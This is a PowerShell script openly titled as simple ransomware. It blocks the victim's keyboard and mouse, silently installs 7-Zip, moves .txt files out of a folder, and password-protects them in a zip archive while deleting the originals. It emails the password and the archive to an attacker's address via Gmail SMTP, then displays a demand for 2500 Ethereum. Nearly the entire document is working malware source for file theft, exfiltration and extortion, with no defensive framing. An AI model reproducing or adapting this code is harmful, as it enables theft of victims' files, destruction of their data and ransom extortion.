Simple Little PowerShell "Ransomware"

1. #Temporarily disable user mouse and keyboard input
2. $code = @"
3.    [DllImport("user32.dll")]
4.    public static extern bool BlockInput(bool fBlockIt);
5. "@
6.  
7. $userInput = Add-Type -MemberDefinition $code -Name UserInput -Namespace UserInput -PassThru
8. $userInput::BlockInput($true)
9.  
10. #Install 7zip to zip files
11. $workdir = "c:\installer\"
12.  
13. If (Test-Path -Path $workdir -PathType Container)
14. { Write-Host "$workdir already exists" -ForegroundColor Red}
15. ELSE
16. { New-Item -Path $workdir  -ItemType directory }
17.  
18. #Download the installer
19. $source = "http://www.7-zip.org/a/7z1604-x64.msi"
20. $destination = "$workdir\7-Zip.msi"
21.  
22.  
23. if (Get-Command 'Invoke-Webrequest')
24. {
25.      Invoke-WebRequest $source -OutFile $destination
26. }
27. else
28. {
29.     $WebClient = New-Object System.Net.WebClient
30.     $webclient.DownloadFile($source, $destination)
31. }
32.  
33. Invoke-WebRequest $source -OutFile $destination
34.  
35. #Start the installation
36. msiexec.exe /i "$workdir\7-Zip.msi" /qb
37.  
38. #Wait a few Seconds for the installation to finish
39. Start-Sleep -s 10
40.  
41. #Remove the installer
42. rm -Force $workdir\7*
43.  
44. #Set source and destination of files to copy and store (ideally you would use something other than desktop)
45. $Source = "C:\Users\(username)\Desktop\StealableFiles"
46. $Destination = "C:\Users\(username)\Desktop\StolenFiles"
47.  
48. #Copy all files with certain extension and delete them in the source location
49. $cp = robocopy /mov $Source $Destination *.txt /s
50.  
51. #Generate a random 8 character password
52. [Reflection.Assembly]::LoadWithPartialName("System.Web")
53. $randomPassword = [System.Web.Security.Membership]::GeneratePassword(8,2)
54.  
55. #Set source for 7zip exe (usually the same path in most basic computers)
56. $pathTo64Bit7Zip = "C:\Program Files\7-Zip\7z.exe"
57.  
58. #Zip destination folder with the random password previously generated
59. $arguments = "a -tzip ""$Destination"" ""$Destination"" -mx9 -p$randomPassword"
60. $windowStyle = "Normal"
61. $p = Start-Process $pathTo64Bit7Zip -ArgumentList $arguments -Wait -PassThru -WindowStyle $windowStyle
62.  
63. #Delete the destination folder
64. $del = Remove-Item $Destination -Force -Recurse
65.  
66. $email = "(enter email address you want files sent to)"
67.  
68. #Send password for files to your e-mail
69. $SMTPServer = "smtp.gmail.com"
70. $Mailer = new-object Net.Mail.SMTPclient($SMTPServer)
71. $From = $email
72. $To = $email
73. $Subject = "$Destination Password $(get-date -f yyyy-MM-dd)"
74. $Body =  $randomPassword
75. $Msg = new-object Net.Mail.MailMessage($From,$To,$Subject,$Body)
76. $Msg.IsBodyHTML = $False
77. $Mailer.send($Msg)
78. $Msg.Dispose()
79. $Mailer.Dispose()
80.  
81. #Send zip folder to your e-mail
82. $ZipFolder = "C:\Users\(username)\Desktop\StolenFiles.zip"
83. $SMTPServer = "smtp.gmail.com"
84. $Mailer = new-object Net.Mail.SMTPclient($SMTPServer)
85. $From = $email
86. $To = $email
87. $Subject = "$Destination Content $(get-date -f yyyy-MM-dd)"
88. $Body = "Zip Attached"
89. $Msg = new-object Net.Mail.MailMessage($From,$To,$Subject,$Body)
90. $Msg.IsBodyHTML = $False
91. $Attachment = new-object Net.Mail.Attachment($ZipFolder)
92. $Msg.attachments.add($Attachment)
93. $Mailer.send($Msg)
94. $Attachment.Dispose()
95. $Msg.Dispose()
96. $Mailer.Dispose()
97.  
98. #Delete the zip file created
99. $del = Remove-Item $ZipFolder -Force -Recurse
100.  
101. #Disable temporary user keyboard and mouse input block
102. $userInput::BlockInput($false)
103.  
104. #Display a message demanding money
105. #Add the required .NET assembly for message display
106. Add-Type -AssemblyName System.Windows.Forms
107.  
108. #Show the message
109. $result = [System.Windows.Forms.MessageBox]::Show('We have some of your important files!!! We demand 2500 Etherum for their return! be careful next time when surfing Internet!', '!-Notice-!', 'Ok', 'Warning')